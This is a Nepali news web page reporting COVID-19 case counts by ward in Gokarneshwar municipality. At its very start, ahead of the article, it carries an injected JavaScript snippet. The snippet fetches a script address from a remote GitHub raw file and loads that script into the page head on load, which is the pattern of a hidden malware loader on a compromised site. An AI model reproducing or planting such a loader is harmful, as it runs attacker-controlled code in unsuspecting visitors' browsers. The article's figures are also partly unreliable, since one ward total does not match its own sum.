;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); गोकर्णेश्वर नगरपालिकामा कोरोना संक्रमितको संख्या १६ सय नाघ्यो, कहाँ कति ? – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • गोकर्णेश्वर नगरपालिकामा कोरोना संक्रमितको संख्या १६ सय नाघ्यो, कहाँ कति ?
Breaking News

गोकर्णेश्वर नगरपालिकामा कोरोना संक्रमितको संख्या १६ सय नाघ्यो, कहाँ कति ?

काठमाडौँ, जेठ १० ।

गोकर्णेश्वर नगरपालिकामा दोश्रो चरणको कोरोना संक्रमित संख्या  ८८४ जना पुरुष र ७५३ जना महिला गरि कुल १६३७ जनामा कोरोना संक्रमण पुष्टि भएको नगरपालिका स्वास्थ्य शाखाले जानकारी गराएको छ ।

गोकर्णेश्वर नगरपालिकाका कुन वडा मा कति कोरोना संक्रमित ?

गोकर्णेश्वर नगरपालिका वडा नं १ मा ३१ जना पुरुष र २६ जना महिला गरि कुल ५७ जना

वडा नं २ मा ३६ जना पुरुष र ३० जना महिला गरि कुल ६६ जना

वडा नं३ मा ४१ जना पुरुष र २५ जना महिला गरि कुल ६६ जना

वडा नं ४ मा १३० जना पुरुष र ११६जना महिला गरि कुल २४६ जना

वडा नं ५ मा १६८ जना पुरुष र १२५ जना महिला गरि २९३ जना

वडा नं ६ मा १९१ जना पुरुष र १३५ जना महिला गरि ३५६ जना

वडा नं ७ मा ६४ जना पुरुष र ६८ जना महिला गरि कुल १३२ जना

वडा नं ८ मा १७५ जना पुरुष र १५२ जना महिला गरि कुल ३२७ जना

वडा नं ९ मा ४८ जना पुरुष र ४६ जना महिला गरि कुल ९४ जना संक्रमित रहेको जनाएको छ।

 

फेसबुक प्रतिक्रियाहरु